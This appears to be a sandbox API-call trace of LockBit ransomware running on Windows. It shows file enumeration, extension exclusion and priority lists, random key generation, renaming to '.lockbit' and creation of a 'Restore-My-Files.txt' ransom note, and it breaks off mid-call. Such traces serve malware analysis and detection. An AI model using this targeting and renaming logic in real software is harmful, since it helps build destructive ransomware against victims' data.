LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.901] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.906] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.907] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.908] free (_Block=0x1fa2ed8) [0158.908] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0324704.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.908] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.908] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3260, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0337280.JPG", cAlternateFileName="")) returned 1 [0158.908] lstrcmpiW (lpString1=".", lpString2="J0337280.JPG") returned -1 [0158.908] lstrcmpiW (lpString1="..", lpString2="J0337280.JPG") returned -1 [0158.908] PathFindExtensionW (pszPath="J0337280.JPG") returned=".JPG" [0158.909] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.909] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.909] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.910] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.910] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.911] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.911] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.911] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0337280.JPG") returned 1 [0158.911] lstrcmpiW (lpString1="ntldr", lpString2="J0337280.JPG") returned 1 [0158.911] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0337280.JPG") returned 1 [0158.911] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0337280.JPG") returned -1 [0158.911] lstrcmpiW (lpString1="autorun.inf", lpString2="J0337280.JPG") returned -1 [0158.911] lstrcmpiW (lpString1="thumbs.db", lpString2="J0337280.JPG") returned 1 [0158.911] lstrcmpiW (lpString1="iconcache.db", lpString2="J0337280.JPG") returned -1 [0158.911] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.911] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG") returned=".JPG" [0158.911] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.911] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.911] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.911] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.912] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.912] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.912] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG.lockbit") returned 72 [0158.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0337280.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0158.914] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.914] malloc (_Size=0x40068) returned 0x1ff1e60 [0158.914] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12896) returned 1 [0158.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0158.915] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.915] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0158.915] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0158.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.920] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.921] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.922] free (_Block=0x1fa2ed8) [0158.922] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.922] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.922] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66188a70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x27d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341328.JPG", cAlternateFileName="")) returned 1 [0158.922] lstrcmpiW (lpString1=".", lpString2="J0341328.JPG") returned -1 [0158.922] lstrcmpiW (lpString1="..", lpString2="J0341328.JPG") returned -1 [0158.922] PathFindExtensionW (pszPath="J0341328.JPG") returned=".JPG" [0158.922] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.922] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.923] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.923] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.924] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.924] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.925] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.925] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.925] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341328.JPG") returned 1 [0158.925] lstrcmpiW (lpString1="ntldr", lpString2="J0341328.JPG") returned 1 [0158.925] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341328.JPG") returned 1 [0158.925] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341328.JPG") returned -1 [0158.925] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341328.JPG") returned -1 [0158.925] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341328.JPG") returned 1 [0158.925] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341328.JPG") returned -1 [0158.925] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.925] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG") returned=".JPG" [0158.925] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.925] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.925] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.925] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.926] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.926] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.926] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.926] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.926] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.926] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.926] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG.lockbit") returned 72 [0158.926] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341328.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0158.932] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.932] malloc (_Size=0x40068) returned 0x3d70450 [0158.932] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10196) returned 1 [0158.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0158.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0158.933] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0158.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.937] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.937] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.938] free (_Block=0x1fa2ed8) [0158.938] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.938] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.938] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2cdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341344.JPG", cAlternateFileName="")) returned 1 [0158.943] lstrcmpiW (lpString1=".", lpString2="J0341344.JPG") returned -1 [0158.943] lstrcmpiW (lpString1="..", lpString2="J0341344.JPG") returned -1 [0158.943] PathFindExtensionW (pszPath="J0341344.JPG") returned=".JPG" [0158.943] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.943] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.943] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.944] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.944] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.945] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.945] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341344.JPG") returned 1 [0158.945] lstrcmpiW (lpString1="ntldr", lpString2="J0341344.JPG") returned 1 [0158.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341344.JPG") returned 1 [0158.945] lstrcmpiW (lpString1="bootsect.bak", 